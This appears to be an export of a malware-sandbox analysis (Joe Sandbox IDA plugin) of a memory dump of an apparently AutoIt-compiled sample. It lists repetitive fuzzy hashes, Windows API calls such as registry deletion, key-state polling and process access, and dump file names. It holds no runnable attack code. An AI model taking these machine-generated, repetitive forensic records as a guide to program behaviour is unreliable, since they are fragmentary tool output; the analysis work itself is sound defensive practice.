• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: AU3_GetPluginDetails$Wu
• API String ID: 145871493-136108093
• Opcode ID: 1a8b951876d27d2db6043d1d88fc2ce87b629190fe6f898e4756a9c282465399
• Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
• Opcode Fuzzy Hash: 1a8b951876d27d2db6043d1d88fc2ce87b629190fe6f898e4756a9c282465399
• Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
APIs
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
• IsMenu.USER32(?), ref: 0044854D
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
• DrawMenuBar.USER32 ref: 004485AF
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert
• String ID: 0
• API String ID: 3076010158-4108050209
• Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
• Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
• Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
• Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
• SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: MessageSend$_memmove_wcslen
• String ID: ComboBox$ListBox
• API String ID: 1589278365-1403004172
• Opcode ID: c22c1c8709533b42ddd55d3d4fc5b1188074a7fef71f847cac6d68069895a192
• Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
• Opcode Fuzzy Hash: c22c1c8709533b42ddd55d3d4fc5b1188074a7fef71f847cac6d68069895a192
• Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Handle
• String ID: nul
• API String ID: 2519475695-2873401336
• Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
• Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
• Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
• Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 0044337D
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Handle
• String ID: nul
• API String ID: 2519475695-2873401336
• Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
• Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
• Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
• Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                                                                                    APIs
                                                                                                                                                    • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                                                    • _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                                                                                    • String ID: Line:
                                                                                                                                                    • API String ID: 1874344091-1585850449
                                                                                                                                                    • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                                                    • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                                                                                    • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                                                    • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: SysAnimate32
                                                                                                                                                    • API String ID: 0-1011021900
                                                                                                                                                    • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                                                    • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                                                                                    • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                                                    • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                      • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                                      • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                                      • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                                                      • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                                                    • GetFocus.USER32 ref: 0046157B
                                                                                                                                                      • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                                                                      • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                                                                    • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                                                                    • __swprintf.LIBCMT ref: 00461608
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                                                                                    • String ID: %s%d
                                                                                                                                                    • API String ID: 2645982514-1110647743
                                                                                                                                                    • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                                                    • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                                                                    • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                                                    • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                                                    • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                                                                                    • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                                                    • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3488606520-0
                                                                                                                                                    • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                                                    • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                                                                                    • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                                                    • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                                                                    Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: ConnectRegistry_memmove_wcslen
• String ID:
• API String ID: 15295421-0
• Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
• Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
• Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
• Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
APIs
• GetCursorPos.USER32(?), ref: 004563A6
• ScreenToClient.USER32(?,?), ref: 004563C3
• GetAsyncKeyState.USER32(?), ref: 00456400
• GetAsyncKeyState.USER32(?), ref: 00456410
• GetWindowLongW.USER32(?,000000F0), ref: 00456466
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: AsyncState$ClientCursorLongScreenWindow
• String ID:
• API String ID: 3539004672-0
• Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
• Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
• Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
• Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
APIs
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
• Sleep.KERNEL32(0000000A), ref: 0047D455
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Interlocked$DecrementIncrement$Sleep
• String ID:
• API String ID: 327565842-0
• Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
• Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
• Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
• Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
APIs
• GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
• GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
• WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
• WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
• Opcode ID: c9f10585610fffa7a4941cd4de679b7a605c4e2db3209749f595237ca159c93c
• Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
• Opcode Fuzzy Hash: c9f10585610fffa7a4941cd4de679b7a605c4e2db3209749f595237ca159c93c
• Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
• RegCloseKey.ADVAPI32(?), ref: 00441CFE
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Enum$CloseDeleteOpen
• String ID:
• API String ID: 2095303065-0
• Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
• Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
• Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
• Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
APIs
• GetWindowRect.USER32(?,?), ref: 00436A24
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: RectWindow
• String ID:
• API String ID: 861336768-0
• Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
• Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
• Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
• Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32 ref: 00449598
                                                                                                                                                      • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                                                                                    • _wcslen.LIBCMT ref: 0044960D
                                                                                                                                                    • _wcslen.LIBCMT ref: 0044961A
                                                                                                                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                                                                                    Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
